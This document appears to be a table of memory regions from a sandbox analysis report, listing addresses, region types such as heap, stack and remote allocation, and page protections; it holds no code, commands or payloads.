21A1F6A5000
|
heap
|
page read and write
|
||
|
26A87E59000
|
heap
|
page read and write
|
||
|
1E0855B7000
|
heap
|
page read and write
|
||
|
7FF582C40000
|
unkown
|
page readonly
|
||
|
276188B1000
|
heap
|
page read and write
|
||
|
27618E4C000
|
heap
|
page read and write
|
||
|
4A91000
|
unkown
|
page read and write
|
||
|
1E084F50000
|
heap
|
page read and write
|
||
|
20410F99000
|
heap
|
page read and write
|
||
|
7FF52D110000
|
unkown
|
page readonly
|
||
|
2BAAD120000
|
unkown
|
page read and write
|
||
|
208442D0000
|
remote allocation
|
page execute and read and write
|
||
|
1C8DBE40000
|
heap
|
page read and write
|
||
|
20410FC1000
|
heap
|
page read and write
|
||
|
276188F9000
|
heap
|
page read and write
|
||
|
26A8725A000
|
unkown
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2F6B000
|
heap
|
page read and write
|
||
|
1C8DBF25000
|
heap
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
1380007E000
|
trusted library allocation
|
page read and write
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
26A87D5B000
|
heap
|
page read and write
|
||
|
7FFD9B86A000
|
trusted library allocation
|
page read and write
|
||
|
1C8DBC69000
|
unkown
|
page readonly
|
||
|
28728E50000
|
trusted library allocation
|
page read and write
|
||
|
26A87E47000
|
heap
|
page read and write
|
||
|
7FF52D1F0000
|
unkown
|
page readonly
|
||
|
2BAAA4FA000
|
unkown
|
page read and write
|
||
|
26A87E50000
|
heap
|
page read and write
|
||
|
276188F1000
|
heap
|
page read and write
|
||
|
3F9A07F000
|
stack
|
page read and write
|
||
|
276188D0000
|
heap
|
page read and write
|
||
|
7FF58117B000
|
unkown
|
page readonly
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
2BAB05E6000
|
unkown
|
page read and write
|
||
|
225DCACE000
|
unkown
|
page read and write
|
||
|
27618891000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1DDAEA39000
|
heap
|
page read and write
|
||
|
7730000
|
unkown
|
page read and write
|
||
|
138702D0000
|
heap
|
page read and write
|
||
|
7FF512411000
|
unkown
|
page readonly
|
||
|
225DBFF0000
|
heap
|
page read and write
|
||
|
684C77F000
|
stack
|
page read and write
|
||
|
2BAAE8DF000
|
unkown
|
page read and write
|
||
|
28728CEE000
|
heap
|
page read and write
|
||
|
75EA2FE000
|
stack
|
page read and write
|
||
|
26A87202000
|
unkown
|
page read and write
|
||
|
2BAAC750000
|
unkown
|
page readonly
|
||
|
2BAAAD29000
|
unkown
|
page read and write
|
||
|
2872ACC1000
|
heap
|
page read and write
|
||
|
138019E4000
|
trusted library allocation
|
page read and write
|
||
|
7FF58136C000
|
unkown
|
page readonly
|
||
|
2BAAAD19000
|
unkown
|
page read and write
|
||
|
2BAB1BA1000
|
unkown
|
page readonly
|
||
|
2530EA20000
|
heap
|
page read and write
|
||
|
1F2EDFE000
|
stack
|
page read and write
|
||
|
202C03A8000
|
unkown
|
page read and write
|
||
|
1E084EF0000
|
heap
|
page read and write
|
||
|
D01AEF6000
|
unkown
|
page read and write
|
||
|
1E084F41000
|
heap
|
page read and write
|
||
|
2BAAA07A000
|
unkown
|
page read and write
|
||
|
2BAAAC0C000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
202BFC00000
|
unkown
|
page read and write
|
||
|
225DBEF0000
|
unkown
|
page readonly
|
||
|
225DC640000
|
remote allocation
|
page execute and read and write
|
||
|
17953802000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAD376000
|
unkown
|
page read and write
|
||
|
26A874D0000
|
unkown
|
page readonly
|
||
|
4D86000
|
unkown
|
page read and write
|
||
|
1E085030000
|
trusted library allocation
|
page read and write
|
||
|
C5F67FC000
|
stack
|
page read and write
|
||
|
1DDAEB80000
|
heap
|
page read and write
|
||
|
BC095F9000
|
stack
|
page read and write
|
||
|
F25AE7E000
|
stack
|
page read and write
|
||
|
20411100000
|
trusted library allocation
|
page read and write
|
||
|
7FF512402000
|
unkown
|
page readonly
|
||
|
2D0D50B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF58139E000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAACB6E000
|
unkown
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF550526000
|
unkown
|
page readonly
|
||
|
7DF486AC1000
|
unkown
|
page execute read
|
||
|
4C7FFE000
|
stack
|
page read and write
|
||
|
21A1F698000
|
heap
|
page read and write
|
||
|
2A660613000
|
unkown
|
page read and write
|
||
|
26A87E4C000
|
heap
|
page read and write
|
||
|
4B64000
|
unkown
|
page read and write
|
||
|
2295D602000
|
unkown
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
13800C61000
|
trusted library allocation
|
page read and write
|
||
|
28728CBF000
|
heap
|
page read and write
|
||
|
13870247000
|
heap
|
page read and write
|
||
|
1E0855BE000
|
heap
|
page read and write
|
||
|
2BAA7C10000
|
unkown
|
page write copy
|
||
|
7FF52D146000
|
unkown
|
page readonly
|
||
|
7FF513430000
|
unkown
|
page readonly
|
||
|
2BAAC927000
|
unkown
|
page read and write
|
||
|
202BFBB0000
|
unkown
|
page read and write
|
||
|
276187B5000
|
heap
|
page read and write
|
||
|
7212AFE000
|
unkown
|
page readonly
|
||
|
27B001B6000
|
unkown
|
page read and write
|
||
|
17952F70000
|
unkown
|
page readonly
|
||
|
7FF5814D0000
|
unkown
|
page readonly
|
||
|
1DDB0A7E000
|
heap
|
page read and write
|
||
|
2BAAA400000
|
unkown
|
page readonly
|
||
|
2BAA9500000
|
unkown
|
page read and write
|
||
|
28728CE5000
|
heap
|
page read and write
|
||
|
26A87A15000
|
unkown
|
page read and write
|
||
|
7FF58144D000
|
unkown
|
page readonly
|
||
|
2BAADF10000
|
unkown
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
F25A5FE000
|
stack
|
page read and write
|
||
|
2BAAD720000
|
unkown
|
page read and write
|
||
|
2A660B02000
|
unkown
|
page read and write
|
||
|
7FF582A85000
|
unkown
|
page readonly
|
||
|
7FF52D172000
|
unkown
|
page readonly
|
||
|
C19D578000
|
stack
|
page read and write
|
||
|
2DCA000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
7FF582BCF000
|
unkown
|
page readonly
|
||
|
276188C3000
|
heap
|
page read and write
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2D0D4A2F000
|
heap
|
page read and write
|
||
|
28728CEB000
|
heap
|
page read and write
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
204112C0000
|
heap
|
page read and write
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
2BAAC56E000
|
unkown
|
page read and write
|
||
|
2BAAD1B0000
|
unkown
|
page readonly
|
||
|
7FF513556000
|
unkown
|
page readonly
|
||
|
1E084F4A000
|
heap
|
page read and write
|
||
|
7FF512462000
|
unkown
|
page readonly
|
||
|
2BAAA078000
|
unkown
|
page read and write
|
||
|
7FF513437000
|
unkown
|
page readonly
|
||
|
2BAAD66E000
|
unkown
|
page read and write
|
||
|
1CC91450000
|
remote allocation
|
page execute and read and write
|
||
|
21A1F6AD000
|
heap
|
page read and write
|
||
|
1E085467000
|
heap
|
page read and write
|
||
|
7FF582B0B000
|
unkown
|
page readonly
|
||
|
7FF582C46000
|
unkown
|
page readonly
|
||
|
2F0F000
|
heap
|
page read and write
|
||
|
2BAAAD41000
|
unkown
|
page read and write
|
||
|
1386E1F0000
|
heap
|
page read and write
|
||
|
2BAAAB51000
|
unkown
|
page read and write
|
||
|
7FF513588000
|
unkown
|
page readonly
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2295CE13000
|
unkown
|
page read and write
|
||
|
4A00000
|
unkown
|
page execute and read and write
|
||
|
2BAAD180000
|
unkown
|
page readonly
|
||
|
2BAA9460000
|
unkown
|
page read and write
|
||
|
1386E020000
|
heap
|
page read and write
|
||
|
28728C95000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
26A87E59000
|
heap
|
page read and write
|
||
|
225DCB45000
|
unkown
|
page read and write
|
||
|
7FF5124A6000
|
unkown
|
page readonly
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
1DDAED4B000
|
heap
|
page read and write
|
||
|
C7E98FE000
|
stack
|
page read and write
|
||
|
7FF550486000
|
unkown
|
page readonly
|
||
|
7FFDE21F0000
|
direct allocation
|
page execute read
|
||
|
2A66065D000
|
unkown
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
2BAAE5B1000
|
unkown
|
page read and write
|
||
|
1C8DDAE0000
|
heap
|
page read and write
|
||
|
276188FA000
|
heap
|
page read and write
|
||
|
76F0000
|
unkown
|
page read and write
|
||
|
2BAAA65F000
|
unkown
|
page read and write
|
||
|
27B08A0B000
|
unkown
|
page read and write
|
||
|
2FE8000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAC7B0000
|
unkown
|
page read and write
|
||
|
276188C7000
|
heap
|
page read and write
|
||
|
26A87E7D000
|
heap
|
page read and write
|
||
|
26A87E7D000
|
heap
|
page read and write
|
||
|
2BAAE5B5000
|
unkown
|
page read and write
|
||
|
7FF581369000
|
unkown
|
page readonly
|
||
|
1DDAEBA0000
|
trusted library allocation
|
page read and write
|
||
|
75EA3FF000
|
stack
|
page read and write
|
||
|
2D0D4980000
|
heap
|
page read and write
|
||
|
A9264CB000
|
unkown
|
page read and write
|
||
|
27B0534A000
|
unkown
|
page read and write
|
||
|
2D0D537B000
|
trusted library allocation
|
page read and write
|
||
|
C5F71FE000
|
unkown
|
page readonly
|
||
|
1E084F56000
|
heap
|
page read and write
|
||
|
2BAAC551000
|
unkown
|
page read and write
|
||
|
225DC053000
|
unkown
|
page read and write
|
||
|
1380184E000
|
trusted library allocation
|
page read and write
|
||
|
2BAAD370000
|
unkown
|
page read and write
|
||
|
2872ACC2000
|
heap
|
page read and write
|
||
|
17953013000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF582B1A000
|
unkown
|
page readonly
|
||
|
8B38CFE000
|
unkown
|
page readonly
|
||
|
7FF512438000
|
unkown
|
page readonly
|
||
|
22D860F0000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
2BAAC710000
|
heap
|
page read and write
|
||
|
24D9FF99000
|
direct allocation
|
page readonly
|
||
|
2041120A000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF513594000
|
unkown
|
page readonly
|
||
|
2BAA9509000
|
unkown
|
page read and write
|
||
|
7FF52D119000
|
unkown
|
page readonly
|
||
|
7FFD9B6B2000
|
trusted library allocation
|
page read and write
|
||
|
24D9FEB0000
|
unkown
|
page readonly
|
||
|
1E084F7F000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
28728EBB000
|
heap
|
page read and write
|
||
|
7FF582B66000
|
unkown
|
page readonly
|
||
|
A92597A000
|
unkown
|
page read and write
|
||
|
1C8DBBFE000
|
unkown
|
page readonly
|
||
|
26A89CCD000
|
heap
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
1E084F67000
|
heap
|
page read and write
|
||
|
1E084F4C000
|
heap
|
page read and write
|
||
|
1380161F000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
unkown
|
page read and write
|
||
|
1DDB0A84000
|
heap
|
page read and write
|
||
|
7FF581474000
|
unkown
|
page readonly
|
||
|
202BFC81000
|
unkown
|
page read and write
|
||
|
2BAAA054000
|
unkown
|
page read and write
|
||
|
7DF486A71000
|
unkown
|
page execute read
|
||
|
2A6608E1000
|
unkown
|
page readonly
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
261C3DC0000
|
unkown
|
page execute and read and write
|
||
|
17952FF0000
|
heap
|
page read and write
|
||
|
7FF5504C6000
|
unkown
|
page readonly
|
||
|
1386F9E0000
|
heap
|
page read and write
|
||
|
7FF550491000
|
unkown
|
page readonly
|
||
|
1DDAEA08000
|
heap
|
page read and write
|
||
|
2295CF00000
|
unkown
|
page read and write
|
||
|
26A87E43000
|
heap
|
page read and write
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
2BAA9464000
|
unkown
|
page read and write
|
||
|
1DDAEA20000
|
heap
|
page read and write
|
||
|
7FF582BA2000
|
unkown
|
page readonly
|
||
|
1E0855DA000
|
heap
|
page read and write
|
||
|
23ED962C000
|
heap
|
page read and write
|
||
|
C5F6BFE000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
4C93FD000
|
stack
|
page read and write
|
||
|
1DDAECDE000
|
heap
|
page read and write
|
||
|
1DDAE9F3000
|
heap
|
page read and write
|
||
|
2530EAC0000
|
heap
|
page read and write
|
||
|
2BAAD150000
|
unkown
|
page readonly
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
276187E0000
|
trusted library allocation
|
page read and write
|
||
|
700B000
|
unkown
|
page read and write
|
||
|
1E0855E9000
|
heap
|
page read and write
|
||
|
C5F657F000
|
stack
|
page read and write
|
||
|
7FF5814C9000
|
unkown
|
page readonly
|
||
|
24D9FF33000
|
heap
|
page read and write
|
||
|
26A89CCD000
|
heap
|
page read and write
|
||
|
1386FBD0000
|
trusted library allocation
|
page read and write
|
||
|
1E084F4E000
|
heap
|
page read and write
|
||
|
2BAAACDD000
|
unkown
|
page read and write
|
||
|
225DCB4A000
|
unkown
|
page read and write
|
||
|
1386E0B8000
|
heap
|
page read and write
|
||
|
2BAAC51B000
|
unkown
|
page read and write
|
||
|
7FF5A9518000
|
unkown
|
page readonly
|
||
|
2BAAAB05000
|
unkown
|
page read and write
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAECDA000
|
heap
|
page read and write
|
||
|
8B385F1000
|
unkown
|
page read and write
|
||
|
1E086E5D000
|
heap
|
page read and write
|
||
|
7FF581314000
|
unkown
|
page readonly
|
||
|
2BAA94F8000
|
unkown
|
page read and write
|
||
|
2295D530000
|
remote allocation
|
page execute and read and write
|
||
|
23ED94C0000
|
heap
|
page read and write
|
||
|
138701EF000
|
heap
|
page read and write
|
||
|
26A87E64000
|
heap
|
page read and write
|
||
|
28728CB3000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
7FF5504BB000
|
unkown
|
page readonly
|
||
|
26A87E74000
|
heap
|
page read and write
|
||
|
2BAAC564000
|
unkown
|
page read and write
|
||
|
2BAACB83000
|
unkown
|
page read and write
|
||
|
26A87E43000
|
heap
|
page read and write
|
||
|
24D9FFE0000
|
heap
|
page read and write
|
||
|
2872ACD4000
|
heap
|
page read and write
|
||
|
FC843DA000
|
stack
|
page read and write
|
||
|
F25AFFB000
|
stack
|
page read and write
|
||
|
27618E3A000
|
heap
|
page read and write
|
||
|
2D0D5072000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
C7E92FE000
|
stack
|
page read and write
|
||
|
202C0AB0000
|
unkown
|
page execute and read and write
|
||
|
27B06BE6000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
A9265CB000
|
stack
|
page read and write
|
||
|
1387023B000
|
heap
|
page read and write
|
||
|
2BAB04E0000
|
unkown
|
page read and write
|
||
|
1386E072000
|
heap
|
page read and write
|
||
|
27618E58000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
27B0052E000
|
unkown
|
page read and write
|
||
|
276188EB000
|
heap
|
page read and write
|
||
|
7DF486AC0000
|
unkown
|
page readonly
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
2A660679000
|
unkown
|
page read and write
|
||
|
26A87990000
|
remote allocation
|
page execute and read and write
|
||
|
276188EF000
|
heap
|
page read and write
|
||
|
7FF5812A9000
|
unkown
|
page readonly
|
||
|
20410F6B000
|
heap
|
page read and write
|
||
|
20410F89000
|
heap
|
page read and write
|
||
|
26A88410000
|
heap
|
page read and write
|
||
|
D01B17E000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF581359000
|
unkown
|
page readonly
|
||
|
7FF52D128000
|
unkown
|
page readonly
|
||
|
4C83FF000
|
stack
|
page read and write
|
||
|
26A87861000
|
unkown
|
page readonly
|
||
|
7FF581468000
|
unkown
|
page readonly
|
||
|
6E70000
|
heap
|
page execute and read and write
|
||
|
D01ACFF000
|
unkown
|
page read and write
|
||
|
7FF51352E000
|
unkown
|
page readonly
|
||
|
20410EC0000
|
heap
|
page read and write
|
||
|
759E000
|
unkown
|
page read and write
|
||
|
20411202000
|
heap
|
page read and write
|
||
|
7FFD9B6CB000
|
trusted library allocation
|
page read and write
|
||
|
1DDAEA1A000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAE9E5000
|
heap
|
page read and write
|
||
|
2BAAE612000
|
unkown
|
page read and write
|
||
|
7212CFE000
|
unkown
|
page readonly
|
||
|
7FF52D121000
|
unkown
|
page readonly
|
||
|
13801AFE000
|
trusted library allocation
|
page read and write
|
||
|
26A87E26000
|
heap
|
page read and write
|
||
|
13800AEA000
|
trusted library allocation
|
page read and write
|
||
|
7FF5135B2000
|
unkown
|
page readonly
|
||
|
28728C30000
|
heap
|
page read and write
|
||
|
20410FA2000
|
heap
|
page read and write
|
||
|
2BAA7C70000
|
heap
|
page read and write
|
||
|
3112000
|
heap
|
page read and write
|
||
|
7FF52D11B000
|
unkown
|
page readonly
|
||
|
7FF58146D000
|
unkown
|
page readonly
|
||
|
204112C5000
|
heap
|
page read and write
|
||
|
202C0B11000
|
unkown
|
page execute read
|
||
|
7DF486A00000
|
unkown
|
page readonly
|
||
|
7FF52D142000
|
unkown
|
page readonly
|
||
|
2BAA9551000
|
unkown
|
page read and write
|
||
|
1381017D000
|
trusted library allocation
|
page read and write
|
||
|
2BAAD333000
|
unkown
|
page read and write
|
||
|
24D9FC40000
|
heap
|
page read and write
|
||
|
1E4E9F25000
|
heap
|
page read and write
|
||
|
20410F89000
|
heap
|
page read and write
|
||
|
138701F7000
|
heap
|
page read and write
|
||
|
1DDAF1FB000
|
heap
|
page read and write
|
||
|
2BAAE8E3000
|
unkown
|
page read and write
|
||
|
7FFD9B796000
|
trusted library allocation
|
page execute and read and write
|
||
|
20410FA1000
|
heap
|
page read and write
|
||
|
2BAAE63F000
|
unkown
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
2BAAC530000
|
unkown
|
page read and write
|
||
|
2BAAC4F0000
|
unkown
|
page read and write
|
||
|
7FF5A944E000
|
unkown
|
page readonly
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
17953770000
|
remote allocation
|
page execute and read and write
|
||
|
17953002000
|
unkown
|
page read and write
|
||
|
24D9FFA1000
|
direct allocation
|
page execute read
|
||
|
276188BD000
|
heap
|
page read and write
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
2872ACC0000
|
heap
|
page read and write
|
||
|
2BAAC619000
|
unkown
|
page read and write
|
||
|
1E086E51000
|
heap
|
page read and write
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
27B06C41000
|
unkown
|
page read and write
|
||
|
28728CBF000
|
heap
|
page read and write
|
||
|
2BAA953E000
|
unkown
|
page read and write
|
||
|
24D9FC30000
|
unkown
|
page readonly
|
||
|
138016FC000
|
trusted library allocation
|
page read and write
|
||
|
202BFB40000
|
unkown
|
page read and write
|
||
|
7FF581281000
|
unkown
|
page readonly
|
||
|
138703B7000
|
heap
|
page read and write
|
||
|
225DBF30000
|
unkown
|
page readonly
|
||
|
1386FB20000
|
trusted library allocation
|
page read and write
|
||
|
21A20190000
|
direct allocation
|
page execute and read and write
|
||
|
2D0D58A0000
|
trusted library allocation
|
page read and write
|
||
|
1DDAF1DF000
|
heap
|
page read and write
|
||
|
A9254FE000
|
unkown
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
7DF486A10000
|
unkown
|
page readonly
|
||
|
7FF52D138000
|
unkown
|
page readonly
|
||
|
20410FCD000
|
heap
|
page read and write
|
||
|
258001B5000
|
unkown
|
page read and write
|
||
|
28728C77000
|
heap
|
page read and write
|
||
|
1E084F62000
|
heap
|
page read and write
|
||
|
4C8FFC000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAC59B000
|
unkown
|
page read and write
|
||
|
2872ACC5000
|
heap
|
page read and write
|
||
|
7FF5A9526000
|
unkown
|
page readonly
|
||
|
FC84878000
|
stack
|
page read and write
|
||
|
2BAAD6A0000
|
unkown
|
page readonly
|
||
|
24DA1B9C000
|
unkown
|
page read and write
|
||
|
26A89CC0000
|
heap
|
page read and write
|
||
|
1C8DC040000
|
heap
|
page execute and read and write
|
||
|
22D8611B000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
202C042A000
|
unkown
|
page read and write
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
2BAAD550000
|
unkown
|
page readonly
|
||
|
7FF5812B3000
|
unkown
|
page readonly
|
||
|
7FF5123E8000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF58139B000
|
unkown
|
page readonly
|
||
|
1DDAF1FD000
|
heap
|
page read and write
|
||
|
28728CBD000
|
heap
|
page read and write
|
||
|
7750000
|
unkown
|
page read and write
|
||
|
26A87E24000
|
heap
|
page read and write
|
||
|
202C0502000
|
unkown
|
page read and write
|
||
|
2BAAC6EE000
|
unkown
|
page read and write
|
||
|
27618E54000
|
heap
|
page read and write
|
||
|
28728EB7000
|
heap
|
page read and write
|
||
|
1DDAF1DC000
|
heap
|
page read and write
|
||
|
2FBB000
|
heap
|
page read and write
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
2BAAC6D6000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7DF486A41000
|
unkown
|
page execute read
|
||
|
13801120000
|
trusted library allocation
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
7FF52C959000
|
unkown
|
page readonly
|
||
|
E2BE6FE000
|
unkown
|
page readonly
|
||
|
204112CD000
|
heap
|
page read and write
|
||
|
1DDAECDA000
|
heap
|
page read and write
|
||
|
2BAADDA0000
|
unkown
|
page readonly
|
||
|
EADEAFF000
|
stack
|
page read and write
|
||
|
202C0473000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
D01A8CE000
|
unkown
|
page read and write
|
||
|
1C8DB03B000
|
unkown
|
page readonly
|
||
|
2BAAC58B000
|
unkown
|
page read and write
|
||
|
20411784000
|
heap
|
page read and write
|
||
|
7FF550520000
|
unkown
|
page readonly
|
||
|
202BFC13000
|
unkown
|
page read and write
|
||
|
FC84DFE000
|
stack
|
page read and write
|
||
|
21A20190000
|
direct allocation
|
page execute and read and write
|
||
|
1DDAE9FF000
|
heap
|
page read and write
|
||
|
26A87300000
|
unkown
|
page read and write
|
||
|
28728CC8000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
721287E000
|
stack
|
page read and write
|
||
|
22D86110000
|
heap
|
page read and write
|
||
|
2A660A24000
|
unkown
|
page read and write
|
||
|
4B4E000
|
unkown
|
page read and write
|
||
|
7212B79000
|
stack
|
page read and write
|
||
|
C7E9AFE000
|
unkown
|
page readonly
|
||
|
2BAAED60000
|
unkown
|
page readonly
|
||
|
26A89CCD000
|
heap
|
page read and write
|
||
|
2BAAE5D8000
|
unkown
|
page read and write
|
||
|
2BAA9D60000
|
unkown
|
page readonly
|
||
|
2BAACAA8000
|
unkown
|
page read and write
|
||
|
2BAAE5A3000
|
unkown
|
page read and write
|
||
|
225DC671000
|
unkown
|
page execute read
|
||
|
20410FCC000
|
heap
|
page read and write
|
||
|
20411763000
|
heap
|
page read and write
|
||
|
2A6608F1000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1386FA00000
|
heap
|
page read and write
|
||
|
28728CC2000
|
heap
|
page read and write
|
||
|
2BAA7C00000
|
unkown
|
page read and write
|
||
|
27618894000
|
heap
|
page read and write
|
||
|
276188D2000
|
heap
|
page read and write
|
||
|
7FF52D16D000
|
unkown
|
page readonly
|
||
|
D01B0FE000
|
unkown
|
page read and write
|
||
|
F25AC7C000
|
stack
|
page read and write
|
||
|
1381009F000
|
trusted library allocation
|
page read and write
|
||
|
22D86300000
|
heap
|
page read and write
|
||
|
13801B10000
|
trusted library allocation
|
page read and write
|
||
|
26A87E33000
|
heap
|
page read and write
|
||
|
7FF5A94E6000
|
unkown
|
page readonly
|
||
|
2295D530000
|
unkown
|
page execute and read and write
|
||
|
2BAACB34000
|
unkown
|
page read and write
|
||
|
2BAAF230000
|
remote allocation
|
page execute and read and write
|
||
|
202C0AE0000
|
remote allocation
|
page execute and read and write
|
||
|
F25ACF9000
|
stack
|
page read and write
|
||
|
1DDAEA3A000
|
heap
|
page read and write
|
||
|
26A87D5E000
|
heap
|
page read and write
|
||
|
202C0AB0000
|
unkown
|
page execute and read and write
|
||
|
2A660643000
|
unkown
|
page read and write
|
||
|
26A87D55000
|
heap
|
page read and write
|
||
|
28728CC2000
|
heap
|
page read and write
|
||
|
28728C95000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
7FF580EB1000
|
unkown
|
page readonly
|
||
|
2BAAC524000
|
unkown
|
page read and write
|
||
|
28728CBA000
|
heap
|
page read and write
|
||
|
2A660600000
|
unkown
|
page read and write
|
||
|
276188C0000
|
heap
|
page read and write
|
||
|
7FF52D152000
|
unkown
|
page readonly
|
||
|
20410F78000
|
heap
|
page read and write
|
||
|
2BAAC57C000
|
unkown
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
2BAAC52D000
|
unkown
|
page read and write
|
||
|
1DDAEA39000
|
heap
|
page read and write
|
||
|
71FB000
|
unkown
|
page read and write
|
||
|
1E0855C3000
|
heap
|
page read and write
|
||
|
2BAA9468000
|
unkown
|
page read and write
|
||
|
7FF5A94DD000
|
unkown
|
page readonly
|
||
|
2BAA7B1F000
|
heap
|
page read and write
|
||
|
202C030A000
|
unkown
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
2BAAD4B0000
|
unkown
|
page read and write
|
||
|
13800A58000
|
trusted library allocation
|
page read and write
|
||
|
7FF512406000
|
unkown
|
page readonly
|
||
|
2295CD30000
|
unkown
|
page readonly
|
||
|
6F40000
|
unkown
|
page write copy
|
||
|
2BAAC730000
|
unkown
|
page readonly
|
||
|
287293A0000
|
heap
|
page read and write
|
||
|
7DF486AB1000
|
unkown
|
page execute read
|
||
|
27B00001000
|
unkown
|
page read and write
|
||
|
23ED9905000
|
heap
|
page read and write
|
||
|
1E0855B0000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
24D9FF40000
|
remote allocation
|
page execute and read and write
|
||
|
1F2F43E000
|
stack
|
page read and write
|
||
|
1C8DBEF0000
|
heap
|
page read and write
|
||
|
1E084F26000
|
heap
|
page read and write
|
||
|
26A87E7D000
|
heap
|
page read and write
|
||
|
20411789000
|
heap
|
page read and write
|
||
|
13801657000
|
trusted library allocation
|
page read and write
|
||
|
25310500000
|
heap
|
page read and write
|
||
|
2BAA94FE000
|
unkown
|
page read and write
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
26A8844D000
|
heap
|
page read and write
|
||
|
2BAAE140000
|
unkown
|
page read and write
|
||
|
23ED9720000
|
heap
|
page read and write
|
||
|
20410FA3000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7DF486A70000
|
unkown
|
page readonly
|
||
|
1DDAF203000
|
heap
|
page read and write
|
||
|
7FF581439000
|
unkown
|
page readonly
|
||
|
6B02CFD000
|
stack
|
page read and write
|
||
|
24D9FF00000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF582B56000
|
unkown
|
page readonly
|
||
|
2BAAF1A0000
|
unkown
|
page execute and read and write
|
||
|
2D0D50F0000
|
heap
|
page execute and read and write
|
||
|
7FF582BA9000
|
unkown
|
page readonly
|
||
|
2BAAE59D000
|
unkown
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
27B0760B000
|
unkown
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26A88428000
|
heap
|
page read and write
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
27618E35000
|
heap
|
page read and write
|
||
|
27B06C3B000
|
unkown
|
page read and write
|
||
|
276188D5000
|
heap
|
page read and write
|
||
|
A9253FF000
|
unkown
|
page read and write
|
||
|
2BAACB85000
|
unkown
|
page read and write
|
||
|
20412FFD000
|
heap
|
page read and write
|
||
|
EADEC7E000
|
stack
|
page read and write
|
||
